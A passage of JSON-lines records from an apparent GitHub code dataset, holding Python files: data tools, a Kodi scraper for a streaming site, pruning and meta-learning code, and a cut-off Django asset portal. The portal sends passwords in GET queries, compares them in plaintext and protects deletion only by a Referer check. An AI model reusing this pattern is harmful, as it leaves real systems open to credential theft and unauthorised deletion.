FATFit[j]['XCENTER'],FATFit[j]['YCENTER']=AnalysisFncs['AstroFncs']['CalcCenter_FromCube'](FATFit[j]['RA'],FATFit[j]['DEC'],CubeInfo)\n # If the fit is successful, compare an MCG realization of the parameters to the data cube\n FATFit[j]=AnalysisFncs['ModelCompFncs']['CompareGeneralTiltedRingModel'](FATFit[j],CubeInfo,AnalysisFncs['MCGFncs'])\n # Return the pair of FAT Tilted Ring dictionaries.\n return FATFit\n","repo_name":"CIRADA-Tools/WKAPP","sub_path":"FitComparisons/CompareFits.py","file_name":"CompareFits.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"13810256259","text":"import copy\r\nfrom modeles.joueur import Joueur\r\nfrom modeles.tournoi import Tournoi\r\nfrom modeles.match import Match\r\nfrom modeles.tour import Tour\r\n\r\nclass Database:\r\n\r\n def serialize_player(self,joueur):\r\n \"\"\" serialize un joueur \"\"\"\r\n serialized_player = {\r\n 'nom': joueur.nom,\r\n 'prenom': joueur.prenom,\r\n 'birthday': joueur.birthday,\r\n 'sexe': joueur.sexe,\r\n 'classement': joueur.classement,\r\n 'total_points': joueur.total_points\r\n }\r\n return serialized_player\r\n\r\n\r\n def serialize_match(self,match):\r\n \"\"\" serialize un match \"\"\"\r\n serialized_match = {\r\n 'joueur1': self.serialize_player(match.joueur1[0]),\r\n 'score1': match.joueur1[1],\r\n 'joueur2': self.serialize_player(match.joueur2[0]),\r\n 'score2': match.joueur2[1]\r\n }\r\n return serialized_match\r\n\r\n\r\n def serialize_tour(self,tour):\r\n \"\"\" serialize un tour \"\"\"\r\n serialized_matchs = []\r\n for match in tour.matchs:\r\n serialized_match = self.serialize_match(match)\r\n serialized_matchs.append(serialized_match)\r\n serialized_tour = {\r\n 'nom': tour.nom,\r\n 'date_debut': tour.date_debut,\r\n 'heure_debut': tour.heure_debut,\r\n 'date_fin': tour.heure_debut,\r\n 'heure_fin': tour.heure_fin,\r\n 'matchs': serialized_matchs\r\n }\r\n return serialized_tour\r\n\r\n\r\n def db_save_championnat(self, db, championnat):\r\n \"\"\" sauvegarde championnat dans base de donnees \"\"\"\r\n players_table = db.table('players')\r\n players_table.truncate()\r\n for joueur in championnat:\r\n serialized_player = self.serialize_player(joueur)\r\n players_table.insert(serialized_player)\r\n\r\n return db\r\n\r\n\r\n def db_load_championnat(self, db):\r\n \"\"\" retourne championnat a partir de base de donnees \"\"\"\r\n serialized_players = db.table('players').all()\r\n championnat = []\r\n for player in serialized_players:\r\n joueur = Joueur(player['nom'], player['prenom'], player['birthday'], player['sexe'], player['classement'])\r\n championnat.append(joueur)\r\n return championnat\r\n\r\n\r\n def db_save_tournois(self, db, tournois):\r\n \"\"\" sauvegarde championnat dans base de donnees \"\"\"\r\n tournois_table = db.table('tournois')\r\n tournois_table.truncate()\r\n for tournoi in tournois:\r\n serialized_players = []\r\n for joueur in tournoi.joueurs:\r\n serialized_player = self.serialize_player(joueur)\r\n serialized_players.append(serialized_player)\r\n serialized_tours = []\r\n for tour in tournoi.tours:\r\n serialized_tour = self.serialize_tour(tour)\r\n serialized_tours.append(serialized_tour)\r\n serialized_tournoi = {\r\n 'nom': tournoi.nom,\r\n 'lieu': tournoi.lieu,\r\n 'date': tournoi.date,\r\n 'description': tournoi.description,\r\n 'joueurs': serialized_players,\r\n 'tours': serialized_tours\r\n }\r\n tournois_table.insert(serialized_tournoi)\r\n\r\n return db\r\n\r\n\r\n def db_load_tournois(self, db):\r\n \"\"\" retourne liste tournois a partir de base de donnees \"\"\"\r\n serialized_tournois = db.table('tournois').all()\r\n deserialized_tournois = []\r\n for tournoi in serialized_tournois:\r\n deserialized_joueurs = [] # remise a zero liste joueurs tournoi\r\n # deserialization de chaque joueur du tournoi\r\n for joueur in tournoi['joueurs']:\r\n deserialized_joueur = Joueur(joueur['nom'], joueur['prenom'],\r\n joueur['birthday'], joueur['sexe'], joueur['classement'])\r\n deserialized_joueur.total_points = joueur['total_points']\r\n deserialized_joueurs.append(deserialized_joueur)\r\n # creation instance Tournoi\r\n deserialized_tournoi = Tournoi(tournoi['nom'], tournoi['lieu'], tournoi['date'],\r\n tournoi['description'], deserialized_joueurs)\r\n # deserialization tours du tournoi\r\n for tour_serialized in tournoi['tours']:\r\n tour = Tour(tour_serialized['nom'], tour_serialized['date_debut'], tour_serialized['heure_debut'],\r\n tour_serialized['date_fin'], tour_serialized['heure_fin'])\r\n for match_serialized in tour_serialized['matchs']:\r\n joueur1_serialized = match_serialized['joueur1']\r\n joueur2_serialized = match_serialized['joueur2']\r\n joueur1 = Joueur(joueur1_serialized['nom'], joueur1_serialized['prenom'],\r\n joueur1_serialized['birthday'], joueur1_serialized['sexe'],\r\n joueur1_serialized['classement'])\r\n joueur2 = Joueur(joueur2_serialized['nom'], joueur2_serialized['prenom'],\r\n joueur2_serialized['birthday'], joueur2_serialized['sexe'],\r\n joueur2_serialized['classement'])\r\n match = Match(joueur1, match_serialized['score1'], joueur2, match_serialized['score2'])\r\n tour.matchs.append(match)\r\n # ajout tour deserialized a l'instance Tournoi\r\n deserialized_tournoi.tours.append(tour)\r\n # ajout tournoi deserialized a la liste des tournois\r\n deserialized_tournois.append(deserialized_tournoi)\r\n return deserialized_tournois\r\n\r\n\r\n def save_tournoi(self, tournoi):\r\n \"\"\" retourne tournoi avec copie des instances de joueurs \"\"\"\r\n copy_joueurs = []\r\n for joueur in tournoi.joueurs:\r\n copy_joueur = copy.deepcopy(joueur)\r\n copy_joueurs.append(copy_joueur)\r\n tournoi.joueurs = copy_joueurs\r\n return tournoi","repo_name":"LeoCapou/OC_Projet4","sub_path":"controleurs/gestion_bdd.py","file_name":"gestion_bdd.py","file_ext":"py","file_size_in_byte":6189,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"29333086953","text":"from django.urls import path\n\nfrom companies import views\n\napp_name = \"companies\"\n\nurlpatterns = [\n path(\"list/\", views.list_company, name=\"list_company\"),\n path(\"search/list/\", views.search_list_company, name=\"search_list_company\"),\n path(\"list/create/\", views.create_company, name=\"create_company\"),\n path(\"list//update/\", views.update_company, name=\"update_company\"),\n path(\"list//\", views.detail_company, name=\"detail_company\"),\n path(\"list//delete/\", views.delete_company, name=\"delete_company\"),\n path(\"csv/company/\", views.csv_company, name=\"csv_company\"),\n]\n","repo_name":"jorgeav527/rpg_labs_repo","sub_path":"app/companies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"26887887536","text":"import scraper\nimport re\nimport urllib\nimport urllib2\nimport urlparse\nimport xbmcaddon\nimport xbmc\nfrom salts_lib.db_utils import DB_Connection\nfrom salts_lib import log_utils\nfrom salts_lib.constants import VIDEO_TYPES\nfrom salts_lib.constants import QUALITIES\nfrom salts_lib.constants import USER_AGENT\n\nBASE_URL = 'http://superchillin.com'\n\nclass NoobRoom_Scraper(scraper.Scraper):\n base_url=BASE_URL\n def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):\n self.timeout=timeout\n self.db_connection = DB_Connection()\n self.base_url = xbmcaddon.Addon().getSetting('%s-base_url' % (self.get_name()))\n self.username = xbmcaddon.Addon().getSetting('%s-username' % (self.get_name()))\n self.password = xbmcaddon.Addon().getSetting('%s-password' % (self.get_name()))\n self.include_paid = xbmcaddon.Addon().getSetting('%s-include_premium' % (self.get_name())) == 'true'\n \n @classmethod\n def provides(cls):\n return frozenset([VIDEO_TYPES.TVSHOW, VIDEO_TYPES.SEASON, VIDEO_TYPES.EPISODE, VIDEO_TYPES.MOVIE])\n \n @classmethod\n def get_name(cls):\n return 'NoobRoom'\n \n def resolve_link(self, link):\n url = urlparse.urljoin(self.base_url, link)\n html = self._http_get(url, cache_limit=.5)\n match = re.search('\"file\"\\s*:\\s*\"([^\"]+)', html)\n if match:\n file_link = match.group(1)\n stream_url = urlparse.urljoin(self.base_url, file_link)\n self._set_cookies(self.base_url, {})\n request = urllib2.Request(stream_url)\n request.add_header('User-Agent', USER_AGENT)\n request.add_unredirected_header('Host', request.get_host())\n request.add_unredirected_header('Referer', url)\n response = urllib2.urlopen(request)\n return response.geturl()\n \n def format_source_label(self, item):\n label='[%s] (%s) %s (%s/100) ' % (item['quality'], item['res'], item['host'], item['rating'])\n return label\n \n def get_sources(self, video):\n source_url=self.get_url(video)\n hosters = []\n if source_url:\n url = urlparse.urljoin(self.base_url, source_url)\n html = self._http_get(url, cache_limit=.5)\n \n has_1080p=False\n match = re.search('Watch in 1080p', html)\n if match:\n has_1080p=True\n \n if video.video_type == VIDEO_TYPES.MOVIE:\n quality = QUALITIES.HD\n else:\n quality = QUALITIES.HIGH\n \n for match in re.finditer(\"class='hoverz'.*?href='([^']+)'>([^<]+)\\s+\\(([^)]+).*?>(\\d+)%\", html, re.DOTALL):\n url, host, status, load = match.groups()\n if not self.include_paid and status.upper()=='PAID':\n continue\n \n url = url.replace('&', '&')\n host = '%s (%s)' % (host, status)\n hoster = {'multi-part': False, 'host': host, 'class': self, 'url': url, 'quality': quality, 'views': None, 'rating': 100 - int(load), 'direct': True, 'res': '720p'}\n if quality== QUALITIES.HD:\n hoster['res']='720p'\n else:\n hoster['res']='480p'\n hosters.append(hoster)\n \n if self.include_paid and has_1080p:\n url += '&hd=1'\n hoster = {'multi-part': False, 'host': host, 'class': self, 'url': url, 'quality': QUALITIES.HD, 'views': None, 'rating': 100 - int(load), 'direct': True, 'res': '1080p'}\n hosters.append(hoster)\n return hosters\n\n def get_url(self, video):\n return super(NoobRoom_Scraper, self)._default_get_url(video)\n \n def _get_episode_url(self, show_url, video):\n episode_pattern = \"%sx%02d\\s*-\\s*.*?href='([^']+)\" % (video.season, int(video.episode))\n title_pattern=\"\\d+x\\d+\\s*-\\s*.*?href='([^']+)'>([^<]+)\"\n return super(NoobRoom_Scraper, self)._default_get_episode_url(show_url, video, episode_pattern, title_pattern)\n \n def search(self, video_type, title, year):\n if not self.include_paid and video_type != VIDEO_TYPES.MOVIE: return []\n search_url = urlparse.urljoin(self.base_url, '/search.php?q=')\n search_url += urllib.quote_plus(title)\n html = self._http_get(search_url, cache_limit=.25)\n results=[]\n if video_type == VIDEO_TYPES.MOVIE:\n pattern = '\\s*Movies\\s*(.*)'\n else:\n pattern = '\\s*TV Series\\s*(.*)'\n\n match = re.search(pattern, html)\n if match:\n container = match.group(1)\n pattern = \"href='([^']+)'>([^<]+)\\s*
\\s*(?:\\((\\d{4})\\))?\"\n for match in re.finditer(pattern, container):\n url, match_title, match_year = match.groups('')\n if not year or not match_year or year == match_year:\n result = {'url': url, 'title': match_title, 'year': match_year}\n results.append(result)\n \n return results\n \n @classmethod\n def get_settings(cls):\n settings = super(NoobRoom_Scraper, cls).get_settings()\n name=cls.get_name()\n settings.append(' ' % (name))\n settings.append(' ' % (name))\n settings.append(' ' % (name))\n return settings\n \n def _http_get(self, url, data=None, cache_limit=8):\n # return all uncached blank pages if no user or pass\n if not self.username or not self.password:\n return ''\n \n html=super(NoobRoom_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, data=data, cache_limit=cache_limit)\n if not re.search('href=\"logout.php\"', html):\n log_utils.log('Logging in for url (%s)' % (url), xbmc.LOGDEBUG)\n self.__login()\n html=super(NoobRoom_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, data=data, cache_limit=0)\n \n return html\n\n def __login(self):\n url = urlparse.urljoin(self.base_url, '/login2.php')\n data = {'email': self.username, 'password': self.password}\n html = super(NoobRoom_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, data=data, cache_limit=0)\n if not re.search('href=\"logout.php\"', html):\n raise Exception('noobroom login failed')\n","repo_name":"trickaz/tknorris-beta-repo","sub_path":"plugin.video.salts/scrapers/noobroom_scraper.py","file_name":"noobroom_scraper.py","file_ext":"py","file_size_in_byte":6785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"16371797911","text":"import torch\nimport torch.nn as nn\n\nfrom mmrazor.utils import print_log\nfrom .ops import SparseGptConv2d, SparseGptLinear, SparseGptMixIn\nfrom .utils import replace_with_dynamic_ops\n\n\ndef to_static_model(model: nn.Module):\n \"\"\"Replace dynamicops with torch modules.\"\"\"\n from mmrazor.structures.subnet.fix_subnet import (export_fix_subnet,\n load_fix_subnet)\n fix_subnet = export_fix_subnet(model)[0]\n load_fix_subnet(model, fix_subnet)\n return model\n\n\nclass SparseGptCompressor():\n \"\"\"The compressor with SparseGPT.\"\"\"\n\n def __init__(self) -> None:\n self.model: nn.Module = None\n\n def prepare(self,\n model: nn.Module,\n prune_conv=True,\n prune_linear=True) -> None:\n \"\"\"Prepare for compressing model.\"\"\"\n self.model = model\n prune_modules: dict = {}\n if prune_conv:\n prune_modules[nn.Conv2d] = SparseGptConv2d\n if prune_linear:\n prune_modules[nn.Linear] = SparseGptLinear\n replace_with_dynamic_ops(model, prune_modules)\n\n @classmethod\n def to_static_model(cls, model):\n \"\"\"Convert replaced op with the original torch model.\"\"\"\n return to_static_model(model)\n\n # hessian\n\n def register_hessian_hooks(self):\n \"\"\"Register updating hessian hooks for specified ops.\"\"\"\n for module in self.sparse_ops:\n module.register_hessian_hook()\n\n def remove_hessian_hooks(self):\n \"\"\"Remove updating hessian hooks for specified ops.\"\"\"\n for module in self.sparse_ops:\n module.remove_hessian_hook()\n\n def init_hessian(self, device=None):\n \"\"\"Init hessian.\"\"\"\n for op in self.sparse_ops:\n op.init_hessian(device=device)\n\n # prune\n def prune(self,\n sparsity,\n prunen=0,\n prunem=0,\n blocksize=128,\n percdamp=.01,\n device=torch.device('cuda')):\n \"\"\"Apply the compression algorithm to the model.\"\"\"\n for name, module in self.named_sparse_ops:\n try:\n original_device = next(module.parameters()).device\n module: SparseGptMixIn = module.to(device)\n error = module.prune(\n sparsity=sparsity,\n prunen=prunen,\n prunem=prunem,\n blocksize=blocksize,\n percdamp=percdamp,\n )\n print_log(f'prune {name} success \\t error = {error}')\n module.to(original_device)\n torch.cuda.empty_cache()\n except Exception as e:\n print_log(f'prune {name} failed as {e}')\n\n def prune_24(self, device=torch.device('cuda:0')):\n \"\"\"Apply the compression algorithm to the model with the specified\n setting.\"\"\"\n self.prune(0.5, prunen=2, prunem=4, device=device)\n\n # ops\n\n @property\n def sparse_ops(self):\n \"\"\"The ops to be applied the algorithm.\"\"\"\n assert self.model is not None\n for module in self.model.modules():\n if isinstance(module, SparseGptMixIn):\n yield module\n\n @property\n def named_sparse_ops(self):\n \"\"\"The named ops to be applied the algorithm.\"\"\"\n for name, module in self.model.named_modules():\n if isinstance(module, SparseGptMixIn):\n yield name, module\n","repo_name":"open-mmlab/mmrazor","sub_path":"mmrazor/implementations/pruning/sparse_gpt/compressor.py","file_name":"compressor.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","stars":1223,"dataset":"github-code","pt":"33"} +{"seq_id":"74294895454","text":"import vtk\n\ndef make_actor(polydata):\n \n mapper = vtk.vtkPolyDataMapper()\n mapper.SetInputData(polydata)\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n\n return actor\n\norigin = [0,0,0]\np0 = [1,0,0]\np1 = [0,1,0]\np2 = [0,1,2]\np3 = [1,2,3]\n\npoints = vtk.vtkPoints()\npoints.InsertNextPoint(origin)\npoints.InsertNextPoint(p0)\npoints.InsertNextPoint(p1)\npoints.InsertNextPoint(p2)\npoints.InsertNextPoint(p3)\n\nlines = vtk.vtkCellArray()\n\nfor i in range(3):\n line = vtk.vtkLine()\n line.GetPointIds().SetId(0,i)\n line.GetPointIds().SetId(1, i+1)\n lines.InsertNextCell(line)\n\n \nlinesPolydata = vtk.vtkPolyData()\nlinesPolydata.SetPoints(points)\nlinesPolydata.SetLines(lines)\n\nactor = make_actor(linesPolydata)\nrenderer = vtk.vtkRenderer()\nrenderer.AddActor(actor)\nrenderWindow = vtk.vtkRenderWindow()\nrenderWindow.AddRenderer(renderer)\nrenderWindow.SetSize(1000, 1000)\nrenderWindowInteractor = vtk.vtkRenderWindowInteractor()\nrenderWindowInteractor.SetRenderWindow(renderWindow)\nrenderWindow.Render()\nrenderWindowInteractor.Start()\n\n","repo_name":"EunbyeolCho/study_VTK","sub_path":"tutorial/longLine.py","file_name":"longLine.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"4621165056","text":"import os\nfrom tqdm import tqdm\nimport sys\nimport pandas as pd\ndef make_txt_from(dir_to_tsv, txts_destination_dir):\n #all_files = os.listdir(dir_to_tsv)\n #text_index_file = [i for i in all_files if '.tsv' in i]\n #assertEqual(len(text_index_file), 1)\n text_index_file = os.path.join(dir_to_tsv, 'line_index.tsv')\n file_tsv_df = pd.read_csv(text_index_file, delimiter='\\t', header=None)\n for index, file in tqdm(enumerate(file_tsv_df[0])):\n \ttxt_file = str(file)+'.txt'\n\n \twith open(os.path.join(txts_destination_dir, txt_file), 'w+') as f:\n f.write(str(file_tsv_df[1][index]))\n\nif __name__ == \"__main__\":\n dir_to_tsv = sys.argv[1] #directory to line_index.tsv\n txts_destination_dir = sys.argv[2] #destinationn directory\n make_txt_from(dir_to_tsv, txts_destination_dir)\n","repo_name":"Open-Speech-EkStep/common_scripts","sub_path":"misc/make_txt_files_openslr.py","file_name":"make_txt_files_openslr.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"1385592884","text":"from typing import List\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import cross_val_score\n\nfrom metadatabase import MetaDataBase\nfrom metalearners.base_agnostic_learner import BaseAgnosticLearner\nfrom utilities import TimeoutException, time_limit\n\n\nclass AverageRegretLearner(BaseAgnosticLearner):\n def __init__(self, verbosity: int = 1):\n \"\"\"Initialize the dataset-agnostic average regret meta-learner. The method computes the average regret\n for all pipelines in the metadataset in the offline phase, and ranks approaches accordingly.\n In the online phase the best-ranked pipelines, with at least a specified amount of evaluations can be recommended.\n It deos not tailor the online phase to the dataset at hand, making it a dataset-agnostic method.\n\n Arguments\n ---------\n verbosity: int,\n Set to 1 or larger to get feedback. If smaller no progress is shown.\n \"\"\"\n super().__init__()\n self._verbosity = verbosity\n\n def offline_phase(self, mdbase: MetaDataBase, metric: str = \"neg_log_loss\", higher_is_better: bool = True) -> None:\n \"\"\"Performs offline computation (e.g. average rank computation) using the specified metadatabase.\n Stores average normalized regret per pipeline, on on how many evaluations this is based.\n\n Arguments\n ---------\n mdbase: MetaDataBase,\n metadatabase of prior experiences, as created in metadatabase.MetaDataBase class.\n metric: string,\n the metric by which the ranking is created from the metadataset.\n higher_is_better: boolean,\n whether or not a higher value of `metric `is better, needed to compute utility.\n \"\"\"\n self._mdbase = mdbase\n\n # first process all of the scores such that they are normalized regret between 0 and 1, with 0 being best.\n pipelines_to_ranking_scores = {}\n for pipe_id in mdbase.list_pipelines(by=\"id\"):\n pipelines_to_ranking_scores[pipe_id] = []\n for did in mdbase.list_datasets(by=\"id\"):\n did_df = mdbase.get_df(datasets=[did], metrics=[metric])\n max_score = max(did_df[\"score\"])\n min_score = min(did_df[\"score\"])\n for entry in did_df.iterrows():\n row_values = entry[1]\n pipe_id = int(row_values[1])\n raw_score = float(row_values[2])\n ranking_score = abs(max_score - raw_score) / abs(min_score - max_score) # normalized distance to highest result for this dataset\n if higher_is_better:\n ranking_score = 1 - ranking_score # if higher metric is better, then a lower ranking_score is better (cuz min distance to highest score)\n pipelines_to_ranking_scores[pipe_id].extend([ranking_score])\n\n self._pipeline_avgrank = {}\n self._pipeline_avgrank_counts = {}\n for pipe_key, ranking_list in zip(pipelines_to_ranking_scores.keys(), pipelines_to_ranking_scores.values()):\n ranking_score = 0 # 0 is good initialization, because score is non-negative\n if len(ranking_list) != 0:\n ranking_score = sum(ranking_list) / len(ranking_list)\n self._pipeline_avgrank[pipe_key] = ranking_score\n self._pipeline_avgrank_counts[pipe_key] = len(ranking_list)\n\n def online_phase(\n self,\n X: pd.DataFrame,\n y: pd.DataFrame,\n max_time: int,\n evaluate_recommendations: bool = False,\n metric: str = \"neg_log_loss\",\n n_jobs: int = 1,\n total_n_configs: int = 25,\n min_evals: int = 10,\n ) -> None:\n \"\"\"Execute the meta-learning strategy, i.e. recommend the pipelines from the average ranking. But at most `total_n_configs`.\n Note: avoid passing a dataset (`X`,`y`) which is also in `offline_phase()`'s metadatabase `mdbase`\n\n Arguments\n ---------\n X: pd.DataFrame,\n Features that are used during pipeline training and possible characterization and similarity methods.\n y: pd.Series,\n Targets that are used during pipeline training and possible characterization and similarity methods.\n max_time: int,\n The amount of time the online phase is allowed to take. Additionally, when evaluating the method,\n the evaluation method such as LOOCV should take care of time keeping as well.\n This parameter is provided because we allow meta-learners altering their behavior accordingly.\n evaluate_recommendations: boolean,\n whether or not the pipeline is evaluated on (X,y) before including it (in `self._top_configurations`).\n If the pipeline are evaluated, then they are ordered by their rank in `self._top_configurations`.\n metric: str,\n metrics/scoring on which configurations are assessed\n n_jobs: int,\n the `n_jobs` the online phase can use in its computations, especially important for meta-learners\n that evaluate models because they could evaluate a lot more or less depending on this value.\n total_n_configs: integer,\n specifies the number of configurations that should be stored in self._top_configurations\n (ordered high-to-low by estimated performance)\n min_evals: integer,\n the minimal number of evaluations a pipe should have before its average regret is considered for the recommendation of pipelines.\n \"\"\"\n\n # compute which pipes should be recommended\n pipes_with_min_evals = [pipe for pipe in self._pipeline_avgrank_counts if self._pipeline_avgrank_counts[pipe] >= min_evals]\n pipe_rankingscores_min_evals = {pipe: ranking_score for pipe, ranking_score in self._pipeline_avgrank.items() if pipe in pipes_with_min_evals}\n pipe_ranking = sorted(pipe_rankingscores_min_evals, key=lambda x: pipe_rankingscores_min_evals[x], reverse=True)\n pipes_to_recommend = pipe_ranking[:total_n_configs]\n\n # store recommendations\n try:\n with time_limit(max_time):\n for pipe_id in pipes_to_recommend:\n pipe = self._mdbase.get_sklearn_pipeline(pipe_id, X, y, True, True)\n # Must expect not all pipelines may work, e.g. feature selectors may remove all features\n # therefore try fitting pipe, if it does not work do not consider it, fill it in with while loop later\n if evaluate_recommendations:\n try:\n score = float(np.mean(cross_val_score(pipe, X, y, cv=n_jobs, scoring=metric, n_jobs=n_jobs)))\n self.add_configuration(pipe, score, higher_is_better=True)\n except ValueError as e:\n if self._verbosity >= 1:\n print(\"pipeline with id {} failed to fit, do not consider it\".format(pipe_id))\n else:\n score = None # did not evaluate\n self.add_configuration(pipe, score, higher_is_better=True)\n\n except TimeoutException as e:\n if self._verbosity >= 1:\n print(\"online_phase timed out with {} seconds\".format(max_time))\n","repo_name":"leightonvg/mlta","sub_path":"metalearners/average_regret_learner.py","file_name":"average_regret_learner.py","file_ext":"py","file_size_in_byte":7328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"20012342030","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect \nfrom portal.models import Host\nfrom portal.models import Idc\nfrom portal.models import Isp\nfrom portal.models import User\nfrom portal.models import Maintance\nfrom django.http import JsonResponse\nimport time\n\ndef timestamo_datetime(value):\n\tformat = '%Y-%m-%d %H:%M'\n\t#value为传入的时间戳\n\tvalue = time.localtime(value)\n\tdt = time.strftime(format,value)\n\treturn dt\n\n# Create your views here.\nindexURL='http://192.168.100.101:8080/'\ndef login(request):\n\treturn render(request,'portal/login.html')\ndef check_login(request):\n\tusername = request.GET.get('username')\n\t#username = request.GET.get('u')\n\tpasswd = request.GET.get('password')\n\t#查询数据库\n\tpwd = User.objects.get(name__exact=username)\n\tif pwd.pwd == passwd:\n\t\treturn HttpResponseRedirect('/')\n\t\t#return render(request,'portal/index.html')\n\telse:\n\t\t#return HttpResponse('用户名或密码错误')\n\t\t#return HttpResponse('

用户名或密码错误

')\n\t\treturn render(request,'portal/login.html')\ndef addHost(request):\n\treturn render(request,'portal/addHost.html')\ndef addIdc(request):\n\treturn render(request,'portal/addIdc.html')\ndef addMaintance(request):\n\treturn render(request,'portal/addMaintance.html')\ndef saltCMD(request):\n\treturn render(request,'portal/saltCMD.html')\ndef get_hosts(request):\n\t#id=request.GET['id']\n\thosts=Host.objects.all()[:10]\t\n\treturn render(request,'portal/hosts.html',{'hosts':hosts})\ndef idc_lists(request):\n\tidcs_list=Idc.objects.all()[:10]\n\treturn HttpResponse('

测试IDC机房列表

')\n\t#return render(request,'portal/idcs.html')\n#首页\ndef index(request):\n\tresponse = \"\"\n\thosts_list=Host.objects.all()[:10]\n\tidcs_list=Idc.objects.all()[:10]\n\tisps_list=Isp.objects.all()[:10]\n\tmaintances_list=Maintance.objects.all()[:10]\n\tunhosts_list=Host.objects.filter(status='0')[:10]\n\treturn render(request,'index.html',{'hosts':hosts_list,'idcs':idcs_list,'isps':isps_list,'maintances':maintances_list,'unhosts_list':unhosts_list})\n#获取IP地址\ndef ip_address(request):\n\treturn {'ip_address': request.META['REMOTE_ADDR']}\n#搜索框搜索\ndef search(request):\n\thost = request.GET.get('host')\n\tidc = request.GET.get('idc')\n\thosts_array=Host.objects.filter(name__icontains='%s' % host)[:10]\n\tidcs_array=Host.objects.filter(name__icontains='%s' % idc)[:10]\n\thosts_info=\"\"\n\tfor i in hosts_array:\n\t\thosts_info += \"\"+str(i.id)+\"\"+i.name+\"\"+i.ip+\"\"+str(i.role)+\"\"+str(i.rack)+\"\"\n\treturn HttpResponse(\"\"+hosts_info+\"\")\n#检查提交是否正确,包括设备机房维护等所有的\ndef check_action(request):\n\t#不接收GET请求\n\tif request.method == 'GET':\n\t\treturn HttpResponse(status=403)\n\t#根据iname判断表单是什么表单\t\n\tif request.POST[\"iname\"] == \"add-idc\":\n\t\tcity=request.POST[\"idc-city\"].encode('utf8')\n\t\tprovince=request.POST[\"idc-province\"].encode('utf8')\n\t\tisp=request.POST[\"idc-isp\"].encode('utf8')\n\t\tcompany=request.POST[\"idc-company\"].encode('utf8')\n\t\tiname=request.POST[\"iname\"].encode('utf8')\n\t\t\n\t\t#数据库保存数据\n\t\ti1 = Idc(city=city,isp=isp,province=province,company=company)\n\t\ti1.save()\n\t\treturn render(request,'portal/formRes.html')\n\telif request.POST[\"iname\"] == \"add-isp\":\n\t\tname=request.POST[\"isp-name\"].encode('utf8')\n\t\tcontact=request.POST[\"isp-contact\"].encode('utf8')\n\t\tphone=request.POST[\"isp-phone\"].encode('utf8')\n\t\tinfo=request.POST[\"isp-info\"].encode('utf8')\n\t\taddress=request.POST[\"isp-address\"].encode('utf8')\n\t\t#数据库保存数据\n\t\ts1 = Isp(name=name,contact=contact,phone=phone,info=info,address=address)\n\t\ts1.save()\n\t\treturn render(request,'portal/formRes.html')\n\telif request.POST[\"iname\"] == \"add-host\":\n\t\tname=request.POST[\"host-name\"].encode('utf8')\n\t\tip=request.POST[\"host-ip\"].encode('utf8')\n\t\tcontact=request.POST[\"host-contact\"].encode('utf8')\n\t\tmodelNum=request.POST[\"host-modNum\"].encode('utf8')\n\t\trole=request.POST[\"host-role\"].encode('utf8')\n\t\th1 = Host(name=name,ip=ip,role=role,modelNum=modelNum)\n\t\th1.save()\n\t\treturn render(request,'portal/formRes.html')\t\n\telif request.POST[\"iname\"] == \"add-maintance\":\n\t\tiname=request.POST[\"iname\"].encode('utf8')\n\t\tip=request.POST[\"ip\"]\n\t\tinfo=request.POST[\"info\"].encode('utf8')\n\t\treturn HttpResponse(iname)\n\telif request.POST[\"iname\"] == \"init-host\":\n newName=request.POST[\"name\"].encode('utf8')\n info=request.POST[\"info\"].encode('utf8')\n return HttpResponse(newName)\n\telif request.POST[\"iname\"] == \"modify-isp\":\n\t\tiid=request.POST[\"isp-id\"]\n\t\tname=request.POST[\"isp-name\"].encode('utf8')\n\t\tcontact=request.POST[\"isp-contact\"].encode('utf8')\n\t\tphone=request.POST[\"isp-phone\"].encode('utf8')\n\t\tinfo=request.POST[\"isp-info\"].encode('utf8')\n\t\taddress=request.POST[\"isp-address\"].encode('utf8')\n\t\t#数据库保存数据\n\t\ts1 = Isp.objects.filter(id=iid).update(name=name,contact=contact,phone=phone,info=info,address=address)\n\t\treturn render(request,'portal/formRes.html')\n\ndef delete(request):\n\t#不允许直接访问该地址\n\tif 'HTTP_REFERER' in request.META.keys():\n\t\treferrer=request.META['HTTP_REFERER']\n\t\tif referrer != indexURL:\n\t\t\treturn HttpResponse(status=403)\n\t\telse:\t\n\t\t\tif request.GET.get('t') == 'host':\n\t\t\t\thid = request.GET.get('id')\n\t\t\t\tname = request.GET.get('name')\n\t\t\t\tip = request.GET.get('ip')\n\t\t\t\tHost.objects.filter(id=hid).delete()\n\t\t\t\treturn render(request,'portal/formRes.html')\t\t\t\n\t\t\telif request.GET.get('t') == 'idc':\n\t\t\t\tiid = request.GET.get('id')\n\t\t\t\tname = request.GET.get('name')\n\t\t\t\tisp = request.GET.get('isp')\n\t\t\t\tIdc.objects.filter(id=iid).delete()\n\t\t\t\treturn render(request,'portal/formRes.html') \n\t\t\telif request.GET.get('t') == 'isp':\n\t\t\t\tiid = request.GET.get('id')\n\t\t\t\tIsp.objects.filter(id=iid).delete()\n\t\t\t\treturn render(request,'portal/formRes.html')\n\t\t\t\n\telse:\n\t\treturn HttpResponse(status=403)\ndef modify(request):\n\t#不允许直接访问该地址\n\tif 'HTTP_REFERER' in request.META.keys():\n\t\treferrer=request.META['HTTP_REFERER']\n\t\tif referrer != indexURL:\n\t\t\treturn 